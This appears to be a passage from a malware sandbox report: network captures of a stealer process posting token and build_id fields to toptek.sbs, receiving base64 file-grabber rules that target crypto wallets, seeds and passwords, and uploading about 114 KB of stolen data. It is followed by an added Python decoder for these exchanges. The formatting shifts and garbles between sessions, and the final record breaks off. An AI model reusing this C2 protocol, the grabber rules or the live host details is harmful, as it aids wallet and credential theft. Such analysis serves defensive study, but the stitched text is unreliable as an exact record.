2024-12-23 05:22:03 UTC | 322 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----79R16XLF3EKN7YCBAAIW
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:22:03 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 37 39 52 31 36 58 4c 46 33 45 4b 4e 37 59 43 42 41 41 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 37 39 52 31 36 58 4c 46 33 45 4b 4e 37 59 43 42 41 41 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 37 39 52 31 36 58 4c 46 33 45 4b 4e 37 59 43 42 41 41 49 57 0d 0a 43 6f 6e 74
    Data Ascii: ------79R16XLF3EKN7YCBAAIWContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------79R16XLF3EKN7YCBAAIWContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------79R16XLF3EKN7YCBAAIWCont
2024-12-23 05:22:04 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 05:22:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-23 05:22:04 UTC | 2228 | IN | Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49791 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:22:05 UTC | 322 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----UKX479HVAI58YMYMYU37
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:22:05 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------UKX479HVAI58YMYMYU37Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------UKX479HVAI58YMYMYU37Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------UKX479HVAI58YMYMYU37Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:06 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:06 UTC1324INData Raw: 35 32 30 0d 0a 63 6d 56 74 62 33 5a 68 59 6d 78 6c 66 43 56 45 55 6b 6c 57 52 56 39 53 52 55 31 50 56 6b 46 43 54 45 55 6c 58 48 77 71 4c 6e 52 34 64 43 77 71 4c 6e 70 70 63 43 77 71 4c 6e 4a 68 63 69 77 71 4c 6d 52 68 64 43 77 71 64 32 46 73 62 47 56 30 4b 69 34 71 4c 43 70 69 61 58 52 6a 62 32 6c 75 4b 69 34 71 4c 43 70 69 64 47 4d 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 57 52 74 61 57 34 71 4c 69 6f 73 4b 6e 5a 68 62 47 6c 6b 4b 69 34 71 4c 43 70 77 59 58 4e 7a 64 32 39 79 5a 43 6f 75 4b 69 77 71 62 57 39 75 5a 58 6b 71 4c 69 6f 73 4b 6e 4a 6b 63 43 6f 75 4b 69 77 71 63 32 56 79 64 6d 56 79 4b 69 34 71 4c 43 70 6d 62 33 4a 31 62 53 6f 75 4b 69 77 71 63 32 68 76 63 43 6f 75 4b 69 77 71 62 57
                                                                                                                                                                                                                                                                                  Data Ascii: 520cmVtb3ZhYmxlfCVEUklWRV9SRU1PVkFCTEUlXHwqLnR4dCwqLnppcCwqLnJhciwqLmRhdCwqd2FsbGV0Ki4qLCpiaXRjb2luKi4qLCpidGMqLiosKnNlZWQqLiosKmNyeXB0byouKiwqYWRtaW4qLiosKnZhbGlkKi4qLCpwYXNzd29yZCouKiwqbW9uZXkqLiosKnJkcCouKiwqc2VydmVyKi4qLCpmb3J1bSouKiwqc2hvcCouKiwqbW


Session ID: 24
Source IP: 192.168.2.4
Source Port: 49807
Destination IP: 94.130.188.57
Destination Port: 443
PID: 7548
Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com

2024-12-23 05:22:10 UTC  325 bytes  OUT
  POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----LXLXT2689RQIEU3EUA1N
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
  Host: toptek.sbs
  Content-Length: 114841
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-12-23 05:22:10 UTC  16355 bytes  OUT
  Data Raw (the report prints only the beginning of each record): 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 0d 0a 43 6f 6e 74
  Data Ascii (CRLF from the hex shown as \r\n): ------LXLXT2689RQIEU3EUA1N\r\nContent-Disposition: form-data; name="token"\r\n\r\na66c99b4ea1107d67781e132b296cd32\r\n------LXLXT2689RQIEU3EUA1N\r\nContent-Disposition: form-data; name="build_id"\r\n\r\ndadb5e51ebe3ba12afb7fbe624d12a2b\r\n------LXLXT2689RQIEU3EUA1N\r\nCont
2024-12-23 05:22:10 UTC  16355 bytes  OUT
  Data Raw: 38 66 2f 77 43 49 71 6e 69 4d 48 79 65 7a 35 6c 59 36 6c 68 38 5a 7a 2b 30 35 58 63 30 50 42 33 69 43 61 35 75 39 4b 30 4b 39 79 62 6d 79 75 33 4d 62 64 63 6f 49 5a 51 51 54 37 45 67 66 54 36 56 54 38 62 2f 38 6a 62 64 2f 37 73 66 2f 41 4b 41 74 61 6e 68 66 77 44 71 32 69 2b 49 37 54 55 62 71 34 73 33 69 68 33 37 68 47 37 6c 75 55 4b 6a 47 56 48 71 4f 39 5a 66 6a 66 2f 6b 62 62 7a 36 52 2f 77 44 6f 43 31 79 30 58 53 6c 6a 6b 36 54 75 72 50 37 39 54 54 47 4b 72 48 4c 6d 71 71 73 2b 5a 66 64 6f 63 39 53 55 74 46 65 30 66 4e 43 55 55 74 4a 54 41 31 50 44 66 2f 49 79 36 62 2f 31 38 4a 2f 4f 75 39 73 4a 42 5a 2f 45 76 56 6f 5a 76 6c 61 2b 74 6f 70 59 43 66 34 67 69 37 53 50 72 77 66 79 72 67 76 44 6e 2f 49 79 36 62 2f 31 38 70 2f 4f 76 55 50 45 50 68 2b 50 58
  Data Ascii: 8f/wCIqniMHyez5lY6lh8Zz+05Xc0PB3iCa5u9K0K9ybmyu3MbdcoIZQQT7EgfT6VT8b/8jbd/7sf/AKAtanhfwDq2i+I7TUbq4s3ih37hG7luUKjGVHqO9Zfjf/kbbz6R/wDoC1y0XSljk6TurP79TTGKrHLmqqs+Zfdoc9SUtFe0fNCUUtJTA1PDf/Iy6b/18J/Ou9sJBZ/EvVoZvla+topYCf4gi7SPrwfyrgvDn/Iy6b/18p/OvUPEPh+PX
2024-12-23 05:22:10 UTC  16355 bytes  OUT
  Data Raw: 6a 52 61 63 34 79 75 33 30 73 53 49 31 7a 35 34 53 32 61 30 56 6e 55 6c 35 4c 71 42 4a 55 69 51 63 73 35 44 71 51 41 41 43 61 6f 70 34 68 2b 32 51 36 37 71 53 74 6f 2b 6c 57 38 64 78 61 51 32 73 74 35 59 4b 36 2b 55 66 4e 79 53 69 52 4e 68 32 32 67 6b 37 51 4f 32 51 41 4b 74 53 4e 64 71 73 69 32 72 32 34 57 5a 50 4c 6c 57 65 32 6a 6d 56 31 79 44 67 68 31 59 59 79 42 32 37 43 71 7a 52 36 68 6d 54 79 7a 70 69 52 79 68 4e 38 58 39 6d 32 35 6a 4a 54 4f 30 37 44 48 74 42 47 35 75 51 4d 38 31 77 59 33 44 56 36 74 52 75 47 32 6e 35 36 6e 71 5a 64 6a 4d 4e 52 70 63 74 52 36 75 2f 79 37 57 48 54 33 38 74 72 70 32 70 45 44 54 64 4f 6b 47 73 58 63 4b 32 39 39 62 69 65 52 6f 31 6a 6a 5a 55 52 31 6a 6b 41 78 75 2f 76 41 63 39 54 31 70 67 31 65 52 74 54 67 30 75 53 31
  Data Ascii: jRac4yu30sSI1z54S2a0VnUl5LqBJUiQcs5DqQAACaop4h+2Q67qSto+lW8dxaQ2st5YK6+UfNySiRNh22gk7QO2QAKtSNdqsi2r24WZPLlWe2jmV1yDgh1YYyB27CqzR6hmTyzpiRyhN8X9m25jJTO07DHtBG5uQM81wY3DV6tRuG2n56nqZdjMNRpctR6u/y7WHT38trp2pEDTdOkGsXcK299bieRo1jjZUR1jkAxu/vAc9T1pg1eRtTg0uS1
2024-12-23 05:22:10 UTC  16355 bytes  OUT
  Data Raw: 41 68 61 53 69 69 67 59 55 55 55 55 77 46 7a 52 6e 6d 6d 30 76 76 53 43 77 37 50 71 4b 4d 67 30 32 69 69 77 72 45 56 39 2f 77 41 67 2b 54 2f 65 57 71 75 6d 66 65 6c 2b 67 71 7a 65 6e 2f 69 58 7a 66 56 66 35 31 56 30 77 2f 50 4a 39 42 56 78 2b 42 67 61 57 4b 42 6e 30 6f 7a 52 6d 73 78 43 30 55 41 2b 31 4c 6d 67 42 4d 63 55 55 75 66 72 52 6b 55 67 43 67 55 74 46 46 77 45 37 55 75 4b 44 53 30 67 75 4a 69 69 6c 78 52 6a 33 6f 45 4a 69 6a 46 4b 4b 58 46 41 44 63 55 74 4c 69 6c 78 51 46 78 6f 48 38 71 58 46 4c 69 6a 46 4b 34 67 37 31 65 30 37 37 38 32 50 2b 65 44 2f 77 41 71 70 67 56 65 30 37 2f 57 79 63 66 38 73 58 2f 6c 57 56 62 34 47 43 65 70 77 4d 6e 76 55 52 71 56 38 5a 71 49 39 4b 39 79 47 79 4f 75 49 68 35 70 70 36 55 76 57 6b 4e 57 57 68 70 70 70 39 66
  Data Ascii: AhaSiigYUUUUwFzRnmm0vvSCw7PqKMg02iiwrEV9/wAg+T/eWqumfel+gqzen/iXzfVf51V0w/PJ9BVx+BgaWKBn0ozRmsxC0UA+1LmgBMcUUufrRkUgCgUtFFwE7UuKDS0guJiilxRj3oEJijFKKXFADcUtLilxQFxoH8qXFLijFK4g71e07782P+eD/wAqpgVe07/Wycf8sX/lWVb4GCepwMnvURqV8ZqI9K9yGyOuIh5pp6UvWkNWWhppp9f
2024-12-23 05:22:10 UTC  16355 bytes  OUT
  Data Raw: 4b 59 42 52 52 52 51 4d 4f 34 72 64 76 4f 4c 6e 2f 41 49 43 76 38 68 57 45 4f 6f 72 66 76 52 69 35 2f 77 43 41 72 2f 49 56 7a 31 66 6a 51 31 38 53 4b 31 46 4c 53 55 7a 51 44 52 52 52 51 4d 53 6c 6f 78 52 51 41 55 68 70 61 42 37 30 41 4e 35 6f 70 61 4b 41 45 78 7a 52 69 6e 55 6c 41 78 4d 55 47 6c 6f 78 51 42 48 50 2f 77 41 65 6c 78 2f 31 7a 50 38 41 4d 56 6e 36 5a 2f 78 38 50 2f 75 56 6f 33 48 2f 41 42 35 33 48 2f 58 50 2b 6f 72 4f 30 7a 2f 6a 34 66 38 41 33 4b 49 37 4d 44 54 6f 37 30 74 4b 42 69 67 42 74 48 74 54 71 54 46 41 43 55 59 70 77 46 42 6f 43 34 30 30 6f 46 46 4c 52 63 4c 69 55 55 74 41 46 41 44 63 63 55 74 4c 6a 69 6a 46 46 77 75 4a 69 6c 78 78 53 34 70 63 55 72 69 47 34 6f 70 32 4b 41 4b 4c 68 63 62 69 6c 70 32 4d 64 71 4d 55 72 68 63 51 43 72
  Data Ascii: KYBRRRQMO4rdvOLn/AICv8hWEOorfvRi5/wCAr/IVz1fjQ18SK1FLSUzQDRRRQMSloxRQAUhpaB70AN5opaKAExzRinUlAxMUGloxQBHP/wAelx/1zP8AMVn6Z/x8P/uVo3H/AB53H/XP+orO0z/j4f8A3KI7MDTo70tKBigBtHtTqTFACUYpwFBoC400oFFLRcLiUUtAFADccUtLjijFFwuJilxxS4pcUriG4op2KAKLhcbilp2MdqMUrhcQCr
2024-12-23 05:22:10 UTC  16355 bytes  OUT
  Data Raw: 7a 53 2f 77 42 74 36 74 2f 30 45 37 33 2f 41 4c 2f 74 2f 6a 57 42 48 71 39 6e 63 61 51 4c 79 45 7a 78 7a 75 6e 32 6c 4c 61 51 68 69 4c 62 66 35 52 59 6b 4b 4d 6e 66 37 44 67 55 73 2b 70 57 38 46 6d 4c 34 79 4f 31 76 4b 42 44 44 47 48 55 53 47 34 48 33 31 50 48 43 67 66 4e 6e 48 52 6c 48 58 4e 59 2b 31 77 54 56 2b 52 62 32 32 57 35 31 76 44 35 6f 70 57 64 52 37 58 2b 4a 37 66 31 72 36 47 37 2f 62 57 71 2f 38 41 51 54 76 66 2f 41 68 2f 38 61 62 4a 71 32 70 53 78 74 48 4a 71 4e 34 36 4f 43 72 4b 30 37 45 45 48 71 43 4d 31 6e 4e 71 65 6b 71 4e 4e 57 61 4c 55 4c 61 54 55 4c 73 51 78 62 37 68 48 41 6a 7a 74 61 56 76 33 51 77 4e 78 41 48 72 68 75 6d 4f 61 6b 57 6f 4b 30 64 75 6b 38 68 74 35 70 5a 62 6a 65 53 41 52 48 46 41 68 61 56 73 64 7a 6e 67 44 49 79 56 49
  Data Ascii: zS/wBt6t/0E73/AL/t/jWBHq9ncaQLyEzxzun2lLaQhiLbf5RYkKMnf7DgUs+pW8FmL4yO1vKBDDGHUSG4H31PHCgfNnHRlHXNY+1wTV+Rb22W51vD5opWdR7X+J7f1r6G7/bWq/8AQTvf/Ah/8abJq2pSxtHJqN46OCrK07EEHqCM1nNqekqNNWaLULaTULsQxb7hHAjztaVv3QwNxAHrhumOakWoK0duk8ht5pZbjeSARHFAhaVsdzngDIyVI
2024-12-23 05:22:10 UTC  16355 bytes  OUT
  Data Raw: 71 2b 39 31 30 2f 49 37 66 53 39 5a 30 50 77 7a 5a 61 64 34 61 61 35 74 37 75 48 55 46 63 36 6c 63 78 54 42 6b 6a 5a 78 74 41 44 41 34 41 48 51 2b 67 47 65 39 65 63 61 78 59 78 36 62 71 31 78 61 51 58 55 4e 31 43 6a 66 75 35 34 58 44 71 36 39 6a 6b 63 5a 78 31 48 72 58 6f 76 2f 43 6d 2f 77 44 71 50 66 38 41 6b 6e 2f 39 6e 51 76 77 63 47 34 62 74 64 4a 58 50 49 46 70 67 2f 38 41 6f 64 66 4b 4f 4d 6e 30 50 72 71 6d 48 78 46 53 4b 6a 79 62 62 61 6f 33 4e 52 30 64 35 76 47 36 58 6f 38 48 66 61 56 45 38 4c 66 32 70 2f 61 65 7a 47 41 76 7a 2b 56 6e 2b 48 48 54 76 74 39 36 66 34 52 73 62 71 32 31 57 56 35 2f 42 33 39 6a 4b 59 43 42 63 66 32 6d 4c 6a 63 64 79 2f 4a 74 48 54 50 58 50 74 37 31 32 64 46 61 32 52 36 6e 73 49 63 33 4e 62 58 30 58 2b 52 34 51 6e 2b 72
  Data Ascii: q+910/I7fS9Z0PwzZad4aa5t7uHUFc6lcxTBkjZxtADA4AHQ+gGe9ecaxYx6bq1xaQXUN1Cjfu54XDq69jkcZx1HrXov/Cm/wDqPf8Akn/9nQvwcG4btdJXPIFpg/8AodfKOMn0PrqmHxFSKjybbao3NR0d5vG6Xo8HfaVE8Lf2p/aezGAvz+Vn+HHTvt96f4Rsbq21WV5/B39jKYCBcf2mLjcdy/JtHTPXPt712dFa2R6nsIc3NbX0X+R4Qn+r
2024-12-23 05:22:10 UTC  356 bytes  OUT
  Data Raw: 63 36 66 33 57 4f 63 6c 65 54 77 65 4f 61 54 2f 41 49 53 62 58 76 37 4e 2f 73 33 2b 32 39 53 2b 77 62 50 4c 2b 79 2f 61 35 50 4b 32 66 33 64 6d 63 59 39 73 55 57 48 63 37 50 34 67 57 55 64 70 34 4f 38 50 77 57 6a 32 62 32 4e 70 63 33 4e 76 43 38 46 33 44 4b 5a 52 69 4d 6c 7a 73 59 38 73 51 78 50 39 33 4b 67 34 34 7a 35 76 55 72 58 4d 37 32 38 64 75 38 30 6a 51 52 4d 7a 52 78 6c 69 56 51 6e 47 53 42 30 42 4f 42 6e 36 43 6f 71 61 56 68 45 6b 45 38 31 72 63 52 33 46 76 4b 38 4d 30 54 68 34 35 49 32 4b 73 6a 41 35 42 42 48 49 49 50 65 75 6c 73 66 48 6d 71 35 65 44 58 35 5a 2f 45 47 6e 53 41 62 37 50 55 4c 6c 33 41 59 66 64 5a 47 4a 4a 52 67 65 34 36 67 6b 48 72 58 4c 55 55 57 41 36 44 55 50 47 2f 69 58 55 66 50 6a 6b 31 71 39 69 74 5a 6c 4d 5a 73 37 65 64 34
  Data Ascii: c6f3WOcleTweOaT/AISbXv7N/s3+29S+wbPL+y/a5PK2f3dmcY9sUWHc7P4gWUdp4O8PwWj2b2Npc3NvC8F3DKZRiMlzsY8sQxP93Kg44z5vUrXM728du80jQRMzRxliVQnGSB0BOBn6CoqaVhEkE81rcR3FvK8M0Th45I2KsjA5BBHIIPeulsfHmq5eDX5Z/EGnSAb7PULl3AYfdZGJJRge46gkHrXLUUWA6DUPG/iXUfPjk1q9itZlMZs7ed4
  Upload size check: seven 16355-byte records plus the 356-byte tail, 7 x 16355 + 356 = 114841, equal the declared Content-Length. The records after the first continue the same multipart body; the shown portions are base64-alphabet text, and the form field that carries them is cut off in the first record's dump.
2024-12-23 05:22:12 UTC  158 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 23 Dec 2024 05:22:12 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
2024-12-23 05:22:12 UTC  12 bytes  IN
  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
  Data Ascii (CRLF from the hex shown as \r\n): 2\r\nok\r\n0\r\n\r\n
  Decoded chunked body: ok
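Sessions 23 and 24 above show the stealer's check-in and upload protocol: every POST carries the same token and build_id form fields under a hard-coded macOS Opera User-Agent (the sample runs on Windows, so the string is a fixed client artefact rather than the real browser), the first reply is a chunked body holding a base64-encoded file-grabber rule, and the 114841-byte upload is acknowledged with a chunked "ok". The Python below is an added example, not code from the report or from the malware. It rebuilds the multipart fields and decodes the chunked and base64 replies from byte strings copied out of the report's hex dumps (the token/build_id body and the base64 chunk with their CRLFs restored, the two short replies as verbatim hex). Every dump is truncated in the report, so each decoder returns what is recoverable and flags incompleteness. The name|root|masks reading of the grabber rule is an assumption drawn from the visible text, not a documented Vidar format.

```python
"""Decoder for the Vidar C2 exchanges captured in sessions 23 and 24.

Added example, not part of the Joe Sandbox report or of the malware.
Inputs are constructed from the report's "Data Raw" dumps; the field
meaning of the grabber rule (name|root|masks) is an assumption.
"""
from __future__ import annotations

import base64
import re

# --- constructed inputs, copied from the report's dumps --------------------
BOUNDARY = b"----UKX479HVAI58YMYMYU37"          # value from the Content-Type header
REQUEST_BODY = (                                 # session 23, first write, CRLFs restored
    b"------UKX479HVAI58YMYMYU37\r\n"
    b'Content-Disposition: form-data; name="token"\r\n\r\n'
    b"a66c99b4ea1107d67781e132b296cd32\r\n"
    b"------UKX479HVAI58YMYMYU37\r\n"
    b'Content-Disposition: form-data; name="build_id"\r\n\r\n'
    b"dadb5e51ebe3ba12afb7fbe624d12a2b\r\n"
    b"------UKX479HVAI58YMYMYU37\r\n"
    b"Cont"                                      # the report's dump stops here
)
CONFIG_CHUNK_HEADER_HEX = "35 32 30 0d 0a"       # "520\r\n": a 0x520-byte chunk follows
CONFIG_B64 = (                                   # first 250 characters of that chunk
    b"cmVtb3ZhYmxlfCVEUklWRV9SRU1PVkFCTEUlXHwqLnR4dCwqLnppcCwqLnJhciwqLmRhdCwq"
    b"d2FsbGV0Ki4qLCpiaXRjb2luKi4qLCpidGMqLiosKnNlZWQqLiosKmNyeXB0byouKiwqYWRt"
    b"aW4qLiosKnZhbGlkKi4qLCpwYXNzd29yZCouKiwqbW9uZXkqLiosKnJkcCouKiwqc2VydmVy"
    b"Ki4qLCpmb3J1bSouKiwqc2hvcCouKiwqbW"
)
ACK_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"  # session 24 reply, 12 bytes, verbatim
EMPTY_HEX = "30 0d 0a 0d 0a"                     # session 25 reply, 5 bytes, verbatim


def hex_dump_to_bytes(dump: str) -> bytes:
    """Convert a 'Data Raw' hex dump ("32 0d 0a ...") into bytes."""
    return bytes.fromhex(dump)


def parse_multipart(body: bytes, boundary: bytes) -> dict[str, bytes]:
    """Split a multipart/form-data body into {field name: value}.

    A part whose headers or value are cut off by the capture is skipped
    rather than misparsed, so the result only holds fields seen in full.
    """
    delimiter = b"--" + boundary
    fields: dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):                # closing "--boundary--"
            break
        if not part.startswith(b"\r\n"):          # stray bytes between delimiters
            continue
        head, sep, value = part[2:].partition(b"\r\n\r\n")
        if not sep or not value.endswith(b"\r\n"):
            continue                               # truncated part
        match = re.search(rb';\s*name="([^"]*)"', head)
        if match:
            fields[match.group(1).decode("ascii")] = value[:-2]
    return fields


def decode_chunked(body: bytes) -> tuple[bytes, bool]:
    """Decode an HTTP/1.1 chunked body into (payload, complete).

    complete is False when the data ends before the terminating 0-size
    chunk or inside a chunk, which is what a truncated dump looks like.
    """
    out = bytearray()
    pos = 0
    while True:
        line_end = body.find(b"\r\n", pos)
        if line_end < 0:
            return bytes(out), False
        size_field = body[pos:line_end].split(b";", 1)[0].strip()
        try:
            size = int(size_field, 16)
        except ValueError:
            return bytes(out), False
        pos = line_end + 2
        if size == 0:
            return bytes(out), True                # "0\r\n\r\n" terminator reached
        chunk = body[pos:pos + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), False               # chunk cut short by the capture
        pos += size + 2                            # skip the chunk's trailing CRLF


def b64decode_truncated(data: bytes) -> bytes:
    """Decode base64 that may have been cut mid-quartet.

    A dangling single character cannot encode a byte and is dropped; the
    rest is padded to a multiple of four before decoding.
    """
    data = data.strip()
    if len(data) % 4 == 1:
        data = data[:-1]
    return base64.b64decode(data + b"=" * (-len(data) % 4))


def parse_grabber_rule(rule: str) -> dict[str, object]:
    """Split one 'name|root|mask,mask,...' rule (assumed layout, see above)."""
    parts = rule.split("|")
    return {
        "name": parts[0],
        "root": parts[1] if len(parts) > 1 else "",
        "masks": parts[2].split(",") if len(parts) > 2 else [],
    }


def decode_config_response() -> dict[str, object]:
    """Session 23 reply: chunked transfer -> base64 -> grabber rule."""
    raw = hex_dump_to_bytes(CONFIG_CHUNK_HEADER_HEX) + CONFIG_B64
    payload, complete = decode_chunked(raw)
    rule = parse_grabber_rule(b64decode_truncated(payload).decode("ascii"))
    rule["complete"] = complete                    # False: only part of the chunk is shown
    return rule


if __name__ == "__main__":
    print(parse_multipart(REQUEST_BODY, BOUNDARY))
    print(decode_chunked(hex_dump_to_bytes(ACK_HEX)))
    print(decode_config_response())
```

The same functions apply to the later sessions: session 25's reply decodes to an empty, complete chunked body, and the upload in session 24 can be rebuilt by concatenating its records before parsing, although the report only shows the start of each record.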


Session ID: 25
Source IP: 192.168.2.4
Source Port: 49813
Destination IP: 94.130.188.57
Destination Port: 443
PID: 7548
Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com

2024-12-23 05:22:14 UTC  322 bytes  OUT
  POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=----VKFKNOH47GV37Y5F3OPH
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
  Host: toptek.sbs
  Content-Length: 331
  Connection: Keep-Alive
  Cache-Control: no-cache
2024-12-23 05:22:14 UTC  331 bytes  OUT
